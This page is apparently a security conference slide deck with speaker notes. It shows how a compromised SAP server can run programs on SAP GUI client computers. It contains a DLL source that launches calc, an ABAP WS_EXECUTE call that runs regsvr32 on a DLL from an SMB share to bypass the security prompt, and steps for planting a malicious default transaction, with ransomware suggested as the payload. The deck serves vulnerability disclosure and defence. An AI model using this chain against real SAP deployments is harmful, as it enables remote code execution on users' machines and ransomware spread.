SlideShare a Scribd company logo
Agenda
Most critical vulnerabilities
Demo1
Standard SAP attacker actions
Motivation
Dbacookpit transaction
Main research
Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc!
Demo2
Bonus video
Most critical vulnerabilities
How to get admin privilages in SAP?
Over 500+ companies has vulnerable CTC servlet (RCE, 2011 year)
***
3 Java serialization exploits (RCE without authorization 2015)
Information disclosure + SQL injection + CryptoIssue + MissConfig = RCE (Blackhat 2016)
DoS + DoS + RaceCondition + AuthBypass = RCE (Troopers 2016)
Anon Directory Traversal + Escalation Privileges = RCE ( we waiting to fix)
Minimum impact
To compromise SAP need to find some vulnerability or their chain of vulnerability to read
SecStore.properties and SecStore.key to obtain administrator user with SAP_ALL privilages
To elevate privileges and gain access to the system from SAP user or root
Gateway/Dispatcher
SAP GUI SAP GUISAP GUI
Work
process
Work
process
Work
process
Database
Working schema of SAP users
Gateway/Dispatcher
SAP GUI SAP GUISAP GUI
Work
process
Work
process
Work
process
Database
Evil user
exploit
Step 1 of evil user
Step 2 of evil user
Gateway/Dispatcher
SAP GUI SAP GUISAP GUI
Work
process
Work
process
Work
process
Database
Evil user
exploit
Step 2 of evil user
Gateway/Dispatcher
SAP GUI SAP GUISAP GUI
Work
process
Work
process
Work
process
Database
Evil user
exploit
Work
process
That was it…till today
Gateway/Dispatcher
SAP GUI SAP GUISAP GUI
Work
process
Work
process
Work
process
Database
Evil user
exploit
Work
process
demo1
SAP GUI
motivation
11
Goal: attack SAP users from compromised SAP server
While executing transaction “DBACockpit” to manage database SAP GUI we noticed
that SAP GUI offers to open the database management program
After clicking on the web browser button, SAP GUI launched the IE browser and
opened the URL without any security notification .
Interesting! Maybe we can start any program on the client’s
computer…
dbacookipit
WTF
Example of a program which runs
calc
Looking for answers in forums
We had 4 ways
How to disable security prompt
Open some URL with
vulnerable/malicious
ActiveX using IE
Analyze sapfesec.dll
which uses SAP GUI to
draw prompt
Search vulnerability in
whitelist EXE files
sapfesec.dll
White list? What? regsvr32?
regsvr32
regsvr32.exe [/u] [/n] [/i[:cmdline]] evil.dll
cat evil.dll.c
#include <WINDOWS.h>
HRESULT DllInstall(BOOL bInstall, _In_opt_ PCWSTR pszCmdLine)
{
ShellExecute(NULL, "open", "c:WindowsSystem32calc.exe", NULL, NULL, 0);
}
Call regsvr32 from ABAP
CALL FUNCTION 'WS_EXECUTE'
EXPORTING
program = 'c:WindowsSystem32regsvr32.exe'
commandline = '/i /s SMB_SHAREtmpevil.dll'
INFORM = ''
EXCEPTIONS
FRONTEND_ERROR = 1
NO_BATCH = 2
PROG_NOT_FOUND = 3
ILLEGAL_OPTION = 4
GUI_REFUSE_EXECUTE = 5
OTHERS = 6.
Full attack algorithm
Create a new SAP_ALL user
with SAP*
Create a malicious program
Developer key?
Please help
Insert, save and activate
malicious program
Create custom transaction with se93
Connect custom transaction to malware program
Set mlauncher by default transaction
Set mlauncher by default transaction
SAP
Malicious DLL
request
evil.dll
demo2
SAP JAVA GUI 35
• Works great on SAP GUI
• What about SAP JAVA GUI?
SAP JAVA GUI
Trust levels
36
• When a client connects to the server for the first time a trust level for the SAP server
should be defined
SAP JAVA GUI
Trust levels
37
• Productive
• We can execute any program on a client’s computer without user interaction
• Untrusted
• We can’t execute a program on a client’s computer
• BUT it is possible to connect a user to another SAP server
SAP JAVA GUI 38
SAP JAVA GUI
RCE
39
• Productive
• just execute any program via WS_EXECUTE
• Untrusted
• connect user on productive system
• execute any program via WS_EXECUTE
demo3
Solution
SAP security note 2407616
41
That’s it? Nope.
bonus
One type of malware
Most popular ransomwares - CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom start $150 to $2.000 (Cryptomix)
ransomware
ransomware
Bonus video

More Related Content

Similar to SAP strikes back Your SAP server now counter attacks.

Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Purple Teaming With Adversary Emulation.pdf
Purple Teaming With Adversary Emulation.pdfPurple Teaming With Adversary Emulation.pdf
Purple Teaming With Adversary Emulation.pdf
prithaaash
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
guest785f78
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
nettitude_labs
 
Application Security from the Inside - OWASP
Application Security from the Inside - OWASPApplication Security from the Inside - OWASP
Application Security from the Inside - OWASP
Sqreen
 
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
YuChianWu
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps   sumit sidharthNew and improved hacking oracle from web apps   sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
owaspindia
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
Dr. Ramchandra Mangrulkar
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...
Ken DeSouza
 
How to install oracle ops center 12c
How to install oracle ops center 12cHow to install oracle ops center 12c
How to install oracle ops center 12c
Muqthiyar Pasha
 
Public exploit held private : Penetration Testing the researcher’s way
Public exploit held private : Penetration Testing the researcher’s wayPublic exploit held private : Penetration Testing the researcher’s way
Public exploit held private : Penetration Testing the researcher’s way
titanlambda
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
2009-08-24 The Linux Audit Subsystem Deep Dive
2009-08-24 The Linux Audit Subsystem Deep Dive2009-08-24 The Linux Audit Subsystem Deep Dive
2009-08-24 The Linux Audit Subsystem Deep Dive
Shawn Wells
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
QA or the Highway
 
TDC 2015 - POA - Trilha PHP - Shit Happens
TDC 2015 - POA - Trilha PHP - Shit HappensTDC 2015 - POA - Trilha PHP - Shit Happens
TDC 2015 - POA - Trilha PHP - Shit Happens
Jackson F. de A. Mafra
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
 
Apex Enterprise Patterns: Building Strong Foundations
Apex Enterprise Patterns: Building Strong FoundationsApex Enterprise Patterns: Building Strong Foundations
Apex Enterprise Patterns: Building Strong Foundations
Salesforce Developers
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 

Similar to SAP strikes back Your SAP server now counter attacks. (20)

Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Purple Teaming With Adversary Emulation.pdf
Purple Teaming With Adversary Emulation.pdfPurple Teaming With Adversary Emulation.pdf
Purple Teaming With Adversary Emulation.pdf
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 
Application Security from the Inside - OWASP
Application Security from the Inside - OWASPApplication Security from the Inside - OWASP
Application Security from the Inside - OWASP
 
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps   sumit sidharthNew and improved hacking oracle from web apps   sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...
 
How to install oracle ops center 12c
How to install oracle ops center 12cHow to install oracle ops center 12c
How to install oracle ops center 12c
 
Public exploit held private : Penetration Testing the researcher’s way
Public exploit held private : Penetration Testing the researcher’s wayPublic exploit held private : Penetration Testing the researcher’s way
Public exploit held private : Penetration Testing the researcher’s way
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
2009-08-24 The Linux Audit Subsystem Deep Dive
2009-08-24 The Linux Audit Subsystem Deep Dive2009-08-24 The Linux Audit Subsystem Deep Dive
2009-08-24 The Linux Audit Subsystem Deep Dive
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
 
TDC 2015 - POA - Trilha PHP - Shit Happens
TDC 2015 - POA - Trilha PHP - Shit HappensTDC 2015 - POA - Trilha PHP - Shit Happens
TDC 2015 - POA - Trilha PHP - Shit Happens
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Apex Enterprise Patterns: Building Strong Foundations
Apex Enterprise Patterns: Building Strong FoundationsApex Enterprise Patterns: Building Strong Foundations
Apex Enterprise Patterns: Building Strong Foundations
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 

Recently uploaded

Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
Malibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed RoundMalibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed Round
sjcobrien
 
YAML crash COURSE how to write yaml file for adding configuring details
YAML crash COURSE how to write yaml file for adding configuring detailsYAML crash COURSE how to write yaml file for adding configuring details
YAML crash COURSE how to write yaml file for adding configuring details
NishanthaBulumulla1
 
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
safelyiotech
 
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian CompaniesE-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
Quickdice ERP
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
Remote DBA Services
 
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
mz5nrf0n
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
Alberto Brandolini
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
GohKiangHock
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
VALiNTRY360
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
Hornet Dynamics
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
Karya Keeper
 
fiscal year variant fiscal year variant.
fiscal year variant fiscal year variant.fiscal year variant fiscal year variant.
fiscal year variant fiscal year variant.
AnkitaPandya11
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
brainerhub1
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
ICS
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
XfilesPro
 
What next after learning python programming basics
What next after learning python programming basicsWhat next after learning python programming basics
What next after learning python programming basics
Rakesh Kumar R
 

Recently uploaded (20)

Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
Malibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed RoundMalibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed Round
 
YAML crash COURSE how to write yaml file for adding configuring details
YAML crash COURSE how to write yaml file for adding configuring detailsYAML crash COURSE how to write yaml file for adding configuring details
YAML crash COURSE how to write yaml file for adding configuring details
 
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
 
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian CompaniesE-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian Companies
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
 
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
在线购买加拿大英属哥伦比亚大学毕业证本科学位证书原版一模一样
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
 
fiscal year variant fiscal year variant.
fiscal year variant fiscal year variant.fiscal year variant fiscal year variant.
fiscal year variant fiscal year variant.
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
 
What next after learning python programming basics
What next after learning python programming basicsWhat next after learning python programming basics
What next after learning python programming basics
 

SAP strikes back Your SAP server now counter attacks.

  • 1. Agenda Most critical vulnerabilities Demo1 Standard SAP attacker actions Motivation Dbacookpit transaction Main research Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Demo2 Bonus video
  • 3. How to get admin privilages in SAP? Over 500+ companies has vulnerable CTC servlet (RCE, 2011 year) *** 3 Java serialization exploits (RCE without authorization 2015) Information disclosure + SQL injection + CryptoIssue + MissConfig = RCE (Blackhat 2016) DoS + DoS + RaceCondition + AuthBypass = RCE (Troopers 2016) Anon Directory Traversal + Escalation Privileges = RCE ( we waiting to fix)
  • 4. Minimum impact To compromise SAP need to find some vulnerability or their chain of vulnerability to read SecStore.properties and SecStore.key to obtain administrator user with SAP_ALL privilages To elevate privileges and gain access to the system from SAP user or root
  • 5. Gateway/Dispatcher SAP GUI SAP GUISAP GUI Work process Work process Work process Database Working schema of SAP users
  • 6. Gateway/Dispatcher SAP GUI SAP GUISAP GUI Work process Work process Work process Database Evil user exploit Step 1 of evil user
  • 7. Step 2 of evil user Gateway/Dispatcher SAP GUI SAP GUISAP GUI Work process Work process Work process Database Evil user exploit
  • 8. Step 2 of evil user Gateway/Dispatcher SAP GUI SAP GUISAP GUI Work process Work process Work process Database Evil user exploit Work process
  • 9. That was it…till today Gateway/Dispatcher SAP GUI SAP GUISAP GUI Work process Work process Work process Database Evil user exploit Work process
  • 10. demo1
  • 11. SAP GUI motivation 11 Goal: attack SAP users from compromised SAP server While executing transaction “DBACockpit” to manage database SAP GUI we noticed that SAP GUI offers to open the database management program After clicking on the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification . Interesting! Maybe we can start any program on the client’s computer…
  • 13. WTF
  • 14. Example of a program which runs calc
  • 15. Looking for answers in forums
  • 16. We had 4 ways How to disable security prompt Open some URL with vulnerable/malicious ActiveX using IE Analyze sapfesec.dll which uses SAP GUI to draw prompt Search vulnerability in whitelist EXE files
  • 18.
  • 19. White list? What? regsvr32?
  • 20. regsvr32 regsvr32.exe [/u] [/n] [/i[:cmdline]] evil.dll cat evil.dll.c #include <WINDOWS.h> HRESULT DllInstall(BOOL bInstall, _In_opt_ PCWSTR pszCmdLine) { ShellExecute(NULL, "open", "c:WindowsSystem32calc.exe", NULL, NULL, 0); }
  • 21. Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING program = 'c:WindowsSystem32regsvr32.exe' commandline = '/i /s SMB_SHAREtmpevil.dll' INFORM = '' EXCEPTIONS FRONTEND_ERROR = 1 NO_BATCH = 2 PROG_NOT_FOUND = 3 ILLEGAL_OPTION = 4 GUI_REFUSE_EXECUTE = 5 OTHERS = 6.
  • 23. Create a new SAP_ALL user with SAP*
  • 27. Insert, save and activate malicious program
  • 29. Connect custom transaction to malware program
  • 30. Set mlauncher by default transaction
  • 31. Set mlauncher by default transaction
  • 33.
  • 34. demo2
  • 35. SAP JAVA GUI 35 • Works great on SAP GUI • What about SAP JAVA GUI?
  • 36. SAP JAVA GUI Trust levels 36 • When a client connects to the server for the first time a trust level for the SAP server should be defined
  • 37. SAP JAVA GUI Trust levels 37 • Productive • We can execute any program on a client’s computer without user interaction • Untrusted • We can’t execute a program on a client’s computer • BUT it is possible to connect a user to another SAP server
  • 39. SAP JAVA GUI RCE 39 • Productive • just execute any program via WS_EXECUTE • Untrusted • connect user on productive system • execute any program via WS_EXECUTE
  • 40. demo3
  • 43. bonus
  • 44. One type of malware Most popular ransomwares - CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile) Initial ransom start $150 to $2.000 (Cryptomix) ransomware

Editor's Notes

  1. Here is our agenda for today. We’ll start with a brief review on the most common and critical vulnerabilities in SAP. These vulnerabilities give an opportunity to access and compromise critical business data. Then we’ll watch a clip about the string of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly attacker can do when they find and exploit SAP vulnerabilities. In addition, we'll reveal our reasons to conduct this research and watch a clip about exploitation of this vulnerability. And we have a bonus video for you.
  2. Now, let us analyze the vulnerabilities we’ve managed to find.
  3. One of the most critical vulnerabilities, which Remote Code execution, was detected in 2011. It allows any unauthorized user to easily execute an OS command via web browser. Although the vulnerability had been detected 6 years ago, it was successfully used by some Asian hackers in 2016. Till the present day the Internet is scanned for the given vulnerability. It’s also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found out that the number of companies, which hadn’t fixed it, exceeds 500.
  4. To obtain critical information from SAP, attackers/pentesters, it is necessary for them to find a vulnerability in SAP which would give the contents of the file sector. Administrator password scheme (with a password) to access the SAP database is stored in these files. But then I got access application administrator SAP, find and remember exploited vulnerability in another component which will give the system access to SAP.
  5. Now it’s time to have a look at a common work scheme of SAP. With help of SAP GUI users connect to SAP server and do their work.
  6. Let’s consider a situation when an attacker obtains information about SAP, exploits a vulnerability, e.g. in sap gateway or sap disp+work, and accessed SAP database.
  7. While pentesting, we finished at accessing SAP database stage, but today we suggest to go further.
  8. Here is a demo from the previous Troopers conference
  9. So, why did we decide to make this research? It’s no secret that there are a lot transactions, functions and applications, which allows managing and monitoring system, and viewing logs, in SAP.
  10. Once again, we executed the dbacookipit transaction and saw this important database management functionality.
  11. SAP GUI requested a path to open database management program from us. When we want to start with web browser button, SAP GUI without any security notification launched the IE browser and opened the URL. So, we decided to create a special ABAP program with use we can execute any program on target computers. When the research was finished we detected the simplest and the most common wat to start programs on a client’s computer, which is WS_EXECUTE function.
  12. However, when we tried launching calculator with help of ws_exewcute we got a warning message “Do you allow SAP GUI to start calc on your computer?” It is not what we actually wanted to do. So, the next question is: “How to bypass this message?”
  13. We thought, “It’s worth searching in google. Perhaps, there was someone, who has found out how to turn the message off.” Yeap, there was. Actually we found a whole bunch of forum replies about disabling the message by changing Windows register. However, none of them was suitable for us, because we just couldn’t change register keys remotely. Moreover, the solution wasn’t applicable to newer SAP GUI versions.
  14. Still, there was 4 other ways to solve the problem. To open a special Url, which will use vulnerable ActiveX, in IЕxplorer To analyse how sap gui makes a nagscreen with help of sapfesec.dll. Find a vulnerability in whitelist (we’ll speak about this option a bit later) And the 4th one…well, one doesn’t even want to consider it…:D However, on the first stage of researching ActiveX method dropped out. So, we proceeded with the 2nd one.
  15. As it was mentioned before, SAP Security prompt is rendered in the sapfesec.dll file. Analyzing this file we learnt that, if applications stored in SAP GUI directory with certain names, SAP Security prompt won’t appear. Thus, we went on researching with this method.
  16. Mhmm…have you noticed that there is Regsvr32 – file – read,write,execute record in whitelist. I.e. if this file is called from OS Windows, SAP GUI will show no alerts and a file will be executed. Nonetheless, regsvr32 is an OS Windows file, which is required for a stable operating of system, as well as installing and managing dll-files.
  17. Regsvr32 is launched with predefined arguments, with path to a dll file as a mandatory one. A common dll responsible for launching calc looks this way: ***It should be checked which of these functions will be first to finish its work.
  18. It appears that a software written on ABAP and responsible for arbitrarz code processing on a target system will have the following form. Here smb_share is a public data storage, where our dll. With a malicious code will be put into.
  19. Let's consider a hypothetic situation: what would happen if an attacker found the vulnerability.
  20. For starters, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction su01 and copy a user, for example, create a new user with SAP_ALL rights under login EVIL_DEV.
  21. Then, login as the EVIL_DEV user, run transaction se38 and create a program sap_malware_prog.
  22. If a user with developer rights is a new one, the developer key will be needed, which is not a challenge for an attacker.
  23. No comment
  24. Then when we are able to create a program, we click the Insert button, then copy a program, which executes malicious functionality, then save all and activate the program.
  25. The program is created, now we need to create a custom transaction which will launch very malware. For example, we call the transaction MLAUNCHER.
  26. Tie a transaction to a malicious mlauncher functions sap_malware_prog and save it.
  27. However, you can go a step further and set a default transaction. When a user is logged in, transaction mlauncher will start and a machine will run malicious code.
  28. The screenshot shows that we set start transaction – mlauncher for all users.
  29. And then, if you log in an the user in the SAP system, then right after the entrance it will process mlaucher transaction and, for example, launches a calculator.
  30. Тут демо видео.
  31. How can information theft from users' computers harm, say, the company with 1000 users?! Of course by using ransomware.
  32. Protection against ransomware is difficult. Attack ransomware of service is growing more popular since the end 2016. 1. If you are infected, then infect a friend or friends, and you will be unlocked 2. If you want to earn money – spread ransomware and get money
  33. Ransomware is becoming more and more popular, the number of infected user machines is becoming increasing.